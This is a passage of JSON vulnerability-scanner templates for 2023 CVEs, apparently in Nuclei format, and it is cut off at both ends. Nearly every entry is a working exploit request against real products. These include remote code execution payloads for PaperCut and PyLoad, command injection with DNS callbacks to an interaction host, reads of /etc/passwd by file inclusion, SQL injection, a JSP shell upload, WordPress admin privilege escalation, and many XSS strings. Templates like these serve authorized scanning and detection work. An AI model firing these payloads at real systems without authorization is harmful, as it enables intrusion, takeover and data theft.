application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27034","info":{"name":"Blind SQL injection vulnerability in Jms Blog","severity":"critical"},"requests":[{"raw":["@timeout: 12s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\nHost: {{Hostname}}\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n","GET /modules/jmsblog/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(body_2, \"Jms Blog\")"],"condition":"and"}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"evil.com"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://evil.com/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5('CVE-2023-2648');?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["747711c62dffae7dbf726d8241bd07fe"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site 